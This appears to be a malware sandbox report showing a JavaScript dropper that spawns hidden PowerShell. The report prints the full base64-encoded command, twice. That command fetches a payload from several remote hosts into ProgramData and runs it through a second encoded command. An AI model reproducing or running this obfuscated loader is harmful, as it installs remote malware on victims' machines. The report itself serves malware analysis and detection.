Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | May 18, 2023, 9:25 a.m. | May 18, 2023, 9:27 a.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Pzbrjg.js" ApetalousnessTheriomorph Anisoin MultimetallicSemiweekly labionasalBeshell
2160-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABVAG4AZABlAHIAcwBoAHIAdQBiAHMATwB2AGUAcgByAHUAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBlAEEAQgA1AEEASABBAEEAYwBnAEIAdgBBAEcAdwBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAZABRAEIAdwBBAEcAOABBAGIAZwBCAHoAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMQBBAEMANABBAE4AZwBBADAAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAFUAQQBjAHcAQgBwAEEASABNAEEAWgBRAEIAegBBAEYAUQBBAGEAQQBCAGgAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAdwBBAFkAUQBCAGoAQQBHAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAzADsAJAB1AG4AZABlAHIAawBpAG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBZAFEAQgBrAEEARwAwAEEAYQBRAEIAdQBBAEcAawBBAGMAdwBCADAAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAZABnAEIAbABBAEcAdwBBAGUAUQBCAFUAQQBIAEkAQQBiAHcAQgB3AEEARwBnAEEAYgB3AEIAdQBBAEgAVQBBAFkAdwBCAHMAQQBHAFUAQQBkAFEAQgB6AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATQBRAEEAeQBBAEEAPQA9ACIAOwAkAGQAZQB4AHQAcgBvAGwAaQBtAG8AbgBlAG4AZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBNAEEAQQB3AEEAQQA9AD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBRAEEAdQBBAEQARQBBAE4AZwBBADIAQQBDADQAQQBNAGcAQQAxAEEARABBAEEATABnAEEAeABBAEQAawBBAE4AUQBBAD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAegBBAEgAVQBBAGIAUQBCAHQAQQBHAEUAQQBkAEEAQgBsAEEARwB3AEEAZQBRAEIAUQBBAEcAZwBBAFkAUQBCAHkAQQBIAGsAQQBiAGcAQgBuAEEARwA4AEEAYwBBAEIAaABBAEgASQBBAFkAUQBCAHMAQQBIAGsAQQBjAHcAQgBwAEEASABNAEEATABnAEIAegBBAEcAVQBBAGUAQQBCADUAQQBBAD0APQB3AFkAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATQBnAEEAdwBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQAiADsAJABzAHcAZQB2AGUAbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBBAD0APQAiADsAJABCAHIAZQBhAGsAZgBhAHMAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBADEAQQBEAFEAQQBMAHcAQQA1AEEARQBjAEEAVQBRAEEAMQBBAEUARQBBAE8AQQBBAHYAQQBFAHMAQQBSAEEAQgB6AEEARgBrAEEAYgB3AEIAYQBBAEgATQBBAFQAUQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAGcAQQA1AEEARABFAEEATAB3AEIAWQBBAEcANABBAFoAQQBBAHYAQQBIAG8AQQBhAGcAQgBaAEEARQBJAEEAVwBBAEEAMABBAEcANABBAFoAQQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBRAGcAQgBUAEEARgBjAEEAVABRAEIAMgBBAEUAZwBBAGUAQQBCADIAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAHIAbwB3AGUAZABFAGMAdABvAHoAbwBvAG4AIABpAG4AIAAkAEIAcgBlAGEAawBmAGEAcwB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAGYAIgApACAAewAkAG4AbwBzAG8AbQBhAG4AaQBhAEQAZQBwAHUAcgBnAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCAHUAQQBIAFEAQQBZAFEAQgBtAEEARwB3AEEAZABRAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBSAEEAQgAxAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBaAHcAQgB6AEEAQQA9AD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAHcAQQAyAEEAQQA9AD0AIgA7ACQAUAByAG8AdABlAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADIAQQBDADQAQQBNAFEAQQAwAEEARABnAEEATABnAEEAeQBBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAQgBhAGcAdwB5AG4ARABvAGcAZgBpAHMAaABlAHMAIAA9ACAANAA2ADYAOwB0AHIAeQAgAHsAJAB2AGkAYgByAGEAdABvAHIAcwBJAG8AbgBpAGMAaQB6AGUAIAA9ACAAMgAwADUAOwAkAGMAbwB3AGgAaQBkAGUAcwAgAD0AIAA5ADUAMwA7ACQAQQBsAGEAbgBnAGkAbgBlAE8AdgBlAHIAaQBuAHQAZQBuAHMAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQAyAEEARABVAEEAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBiAEEAQgBoAEEARwA0AEEAWgB3AEIANQBBAEMANABBAGIAQQBCADAAQQBHAFEAQQAiADsAJABDAHkAbgBnAGgAYQBuAGUAZABkAFQAcgBpAGEAbgBnAHUAbABhAHIAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAcgBvAHcAZQBkAEUAYwB0AG8AegBvAG8AbgApACkAOwBpAHcAcgAgACQAQwB5AG4AZwBoAGEAbgBlAGQAZABUAHIAaQBhAG4AZwB1AGwAYQByAGkAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdQBsAHAAaABvAG4AZQBzAEcAbwBzAGgAZQBuAGkAdABlAC4AdQBuAGkAbgBoAGkAYgBpAHQAZQBkAGwAeQBWAGUAcgBiAGUAbgBvAGwAOwAkAHAAdQBsAGwAYQBiAGwAZQAgAD0AIAAiAHAAcgBlAGUAeABjAGwAdQBzAGkAdgBlAGwAeQBQAGkAdAB0AGkAbgBnACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB1AGwAcABoAG8AbgBlAHMARwBvAHMAaABlAG4AaQB0AGUALgB1AG4AaQBuAGgAaQBiAGkAdABlAGQAbAB5AFYAZQByAGIAZQBuAG8AbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMwAxADkAMgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEcAOABBAGIAZwBCAGwAQQBIAE0AQQBSAHcAQgB2AEEASABNAEEAYQBBAEIAbABBAEcANABBAGEAUQBCADAAQQBHAFUAQQBMAGcAQgAxAEEARwA0AEEAYQBRAEIAdQBBAEcAZwBBAGEAUQBCAGkAQQBHAGsAQQBkAEEAQgBsAEEARwBRAEEAYgBBAEIANQBBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBaAFEAQgB1AEEARwA4AEEAYgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAWgBlAG4AaQB0AGgAdwBhAHIAZABDAG8AbAB1AG0AYgBpAGQAYQBlACAAPQAgACIAYwBvAGwAbABlAGMAdABpAGIAaQBsAGkAdAB5AFMAZQBtAGkAcABhAHIAbwBjAGgAaQBhAGwAIgA7ACQAcwB1AGIAbABhAG4AZwB1AGEAZwBlAEgAbwBwAGUAaQB0AGUAIAA9ACAANgAyADQAOwAkAHMAaQBsAHYAZQByAGUAeQBlAE8AcgBnAGEAbgBpAGYAeQAgAD0AIAAiAGMAaABhAGMAawBlAHIAVgBpAGcAaQBsAHMAIgA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAHIAaQBnAGgAdABlAHIAcwBIAGkAdgBlAHcAYQByAGQAIAA9ACAAMwAwADQAOwAkAGkAbgB0AGUAcgBuAHUAbgBjAGkAYQBsAGwAeQBBAHMAcwBhAGkAbAAgAD0AIAA3ADEANAA7ACQAVQBuAGEAYwBjAGUAcAB0AGEAYgBsAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AdwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAegBBAEQAZwBBAEwAZwBBAHkAQQBEAE0AQQBPAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABBAEEAYwBnAEIAdgBBAEcANABBAGQAUQBCAHUAQQBHAE0AQQBhAFEAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAEQAQQBHAHcAQQBiAHcAQgAwAEEASABVAEEAYwBnAEIAbABBAEgATQBBAEwAZwBCAGkAQQBIAEkAQQAiADsAfQB9ACQAdQBuAG4AYQB1AHQAaQBjAGEAbABFAHgAcABlAHIAaQBtAGUAbgB0AGkAbgBnACAAPQAgACIAcABsAGUAbgBpAHMAbQAiADsAQQBuAGcAdQBsAGEAcgA7AA=="
2280
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABVAG4AZABlAHIAcwBoAHIAdQBiAHMATwB2AGUAcgByAHUAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADgAQQBlAEEAQgA1AEEASABBAEEAYwBnAEIAdgBBAEcAdwBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgBqAEEARwA4AEEAZABRAEIAdwBBAEcAOABBAGIAZwBCAHoAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMQBBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMQBBAEMANABBAE4AZwBBADAAQQBBAD0APQBHAGoAaABDAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHMAQQBHAFUAQQBjAHcAQgBwAEEASABNAEEAWgBRAEIAegBBAEYAUQBBAGEAQQBCAGgAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdwBBAEcAdwBBAFkAUQBCAGoAQQBHAFUAQQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAzADsAJAB1AG4AZABlAHIAawBpAG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFYAQQBHADQAQQBZAFEAQgBrAEEARwAwAEEAYQBRAEIAdQBBAEcAawBBAGMAdwBCADAAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAZABnAEIAbABBAEcAdwBBAGUAUQBCAFUAQQBIAEkAQQBiAHcAQgB3AEEARwBnAEEAYgB3AEIAdQBBAEgAVQBBAFkAdwBCAHMAQQBHAFUAQQBkAFEAQgB6AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9AE8AbQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQAQQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATQBRAEEAeQBBAEEAPQA9ACIAOwAkAGQAZQB4AHQAcgBvAGwAaQBtAG8AbgBlAG4AZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AdwBBAHcAQQBDADQAQQBNAFEAQQB6AEEARABZAEEATABnAEEAeQBBAEQAQQBBAE4AZwBBAHUAQQBEAEUAQQBNAEEAQQB3AEEAQQA9AD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABnAEEATgBRAEEAdQBBAEQARQBBAE4AZwBBADIAQQBDADQAQQBNAGcAQQAxAEEARABBAEEATABnAEEAeABBAEQAawBBAE4AUQBBAD0AdwBZAGYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBEAEEARwA4AEEAYgBnAEIAegBBAEgAVQBBAGIAUQBCAHQAQQBHAEUAQQBkAEEAQgBsAEEARwB3AEEAZQBRAEIAUQBBAEcAZwBBAFkAUQBCAHkAQQBIAGsAQQBiAGcAQgBuAEEARwA4AEEAYwBBAEIAaABBAEgASQBBAFkAUQBCAHMAQQBIAGsAQQBjAHcAQgBwAEEASABNAEEATABnAEIAegBBAEcAVQBBAGUAQQBCADUAQQBBAD0APQB3AFkAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATQBnAEEAdwBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQB4AEEARABRAEEATQBnAEEAPQAiADsAJABzAHcAZQB2AGUAbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEANABBAEMANABBAE0AUQBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQASQBBAE0AdwBBAHcAQQBBAD0APQAiADsAJABCAHIAZQBhAGsAZgBhAHMAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBADEAQQBEAFEAQQBMAHcAQQA1AEEARQBjAEEAVQBRAEEAMQBBAEUARQBBAE8AQQBBAHYAQQBFAHMAQQBSAEEAQgB6AEEARgBrAEEAYgB3AEIAYQBBAEgATQBBAFQAUQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGcAQQBMAGcAQQA1AEEARABFAEEATAB3AEIAWQBBAEcANABBAFoAQQBBAHYAQQBIAG8AQQBhAGcAQgBaAEEARQBJAEEAVwBBAEEAMABBAEcANABBAFoAQQBBAD0AZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdgBBAEcAMABBAGEAUQBCAFMAQQBDADgAQQBRAGcAQgBUAEEARgBjAEEAVABRAEIAMgBBAEUAZwBBAGUAQQBCADIAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAHIAbwB3AGUAZABFAGMAdABvAHoAbwBvAG4AIABpAG4AIAAkAEIAcgBlAGEAawBmAGEAcwB0AGkAbgBnACAALQBzAHAAbABpAHQAIAAiAGYAIgApACAAewAkAG4AbwBzAG8AbQBhAG4AaQBhAEQAZQBwAHUAcgBnAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCAHUAQQBIAFEAQQBZAFEAQgBtAEEARwB3AEEAZABRAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBSAEEAQgAxAEEASABRAEEAWQB3AEIAbwBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBaAHcAQgB6AEEAQQA9AD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AdwBBADIAQQBDADQAQQBOAHcAQQAyAEEAQQA9AD0AIgA7ACQAUAByAG8AdABlAHUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AUQBBADIAQQBDADQAQQBNAFEAQQAwAEEARABnAEEATABnAEEAeQBBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBPAFEAQQB3AEEAQQA9AD0AIgA7ACQAQgBhAGcAdwB5AG4ARABvAGcAZgBpAHMAaABlAHMAIAA9ACAANAA2ADYAOwB0AHIAeQAgAHsAJAB2AGkAYgByAGEAdABvAHIAcwBJAG8AbgBpAGMAaQB6AGUAIAA9ACAAMgAwADUAOwAkAGMAbwB3AGgAaQBkAGUAcwAgAD0AIAA5ADUAMwA7ACQAQQBsAGEAbgBnAGkAbgBlAE8AdgBlAHIAaQBuAHQAZQBuAHMAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBNAHcAQQB1AEEARABjAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADEAQQBDADQAQQBNAFEAQQAyAEEARABVAEEAbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBiAEEAQgBoAEEARwA0AEEAWgB3AEIANQBBAEMANABBAGIAQQBCADAAQQBHAFEAQQAiADsAJABDAHkAbgBnAGgAYQBuAGUAZABkAFQAcgBpAGEAbgBnAHUAbABhAHIAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAcgBvAHcAZQBkAEUAYwB0AG8AegBvAG8AbgApACkAOwBpAHcAcgAgACQAQwB5AG4AZwBoAGEAbgBlAGQAZABUAHIAaQBhAG4AZwB1AGwAYQByAGkAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAdQBsAHAAaABvAG4AZQBzAEcAbwBzAGgAZQBuAGkAdABlAC4AdQBuAGkAbgBoAGkAYgBpAHQAZQBkAGwAeQBWAGUAcgBiAGUAbgBvAGwAOwAkAHAAdQBsAGwAYQBiAGwAZQAgAD0AIAAiAHAAcgBlAGUAeABjAGwAdQBzAGkAdgBlAGwAeQBQAGkAdAB0AGkAbgBnACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAcwB1AGwAcABoAG8AbgBlAHMARwBvAHMAaABlAG4AaQB0AGUALgB1AG4AaQBuAGgAaQBiAGkAdABlAGQAbAB5AFYAZQByAGIAZQBuAG8AbAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMwAxADkAMgA2ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBjAHcAQgAxAEEARwB3AEEAYwBBAEIAbwBBAEcAOABBAGIAZwBCAGwAQQBIAE0AQQBSAHcAQgB2AEEASABNAEEAYQBBAEIAbABBAEcANABBAGEAUQBCADAAQQBHAFUAQQBMAGcAQgAxAEEARwA0AEEAYQBRAEIAdQBBAEcAZwBBAGEAUQBCAGkAQQBHAGsAQQBkAEEAQgBsAEEARwBRAEEAYgBBAEIANQBBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBaAFEAQgB1AEEARwA4AEEAYgBBAEEAcwBBAEUAUQBBAGIAQQBCAHMAQQBGAEkAQQBaAFEAQgBuAEEARwBrAEEAYwB3AEIAMABBAEcAVQBBAGMAZwBCAFQAQQBHAFUAQQBjAGcAQgAyAEEARwBVAEEAYwBnAEEANwBBAEUARQBBAGIAZwBCAG4AQQBIAFUAQQBiAEEAQgBoAEEASABJAEEAIgA7ACQAWgBlAG4AaQB0AGgAdwBhAHIAZABDAG8AbAB1AG0AYgBpAGQAYQBlACAAPQAgACIAYwBvAGwAbABlAGMAdABpAGIAaQBsAGkAdAB5AFMAZQBtAGkAcABhAHIAbwBjAGgAaQBhAGwAIgA7ACQAcwB1AGIAbABhAG4AZwB1AGEAZwBlAEgAbwBwAGUAaQB0AGUAIAA9ACAANgAyADQAOwAkAHMAaQBsAHYAZQByAGUAeQBlAE8AcgBnAGEAbgBpAGYAeQAgAD0AIAAiAGMAaABhAGMAawBlAHIAVgBpAGcAaQBsAHMAIgA7AGIAcgBlAGEAawA7AEEAbgBnAHUAbABhAHIAOwB9AEEAbgBnAHUAbABhAHIAOwB9ACAAYwBhAHQAYwBoACAAewAkAHIAaQBnAGgAdABlAHIAcwBIAGkAdgBlAHcAYQByAGQAIAA9ACAAMwAwADQAOwAkAGkAbgB0AGUAcgBuAHUAbgBjAGkAYQBsAGwAeQBBAHMAcwBhAGkAbAAgAD0AIAA3ADEANAA7ACQAVQBuAGEAYwBjAGUAcAB0AGEAYgBsAGUAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AdwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBRAEEAegBBAEQAZwBBAEwAZwBBAHkAQQBEAE0AQQBPAFEAQQA9AFAAWgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBhAFEAQgB6AEEASABBAEEAYwBnAEIAdgBBAEcANABBAGQAUQBCAHUAQQBHAE0AQQBhAFEAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAGMAdwBCAEQAQQBHAHcAQQBiAHcAQgAwAEEASABVAEEAYwBnAEIAbABBAEgATQBBAEwAZwBCAGkAQQBIAEkAQQAiADsAfQB9ACQAdQBuAG4AYQB1AHQAaQBjAGEAbABFAHgAcABlAHIAaQBtAGUAbgB0AGkAbgBnACAAPQAgACIAcABsAGUAbgBpAHMAbQAiADsAQQBuAGcAdQBsAGEAcgA7AA==" |
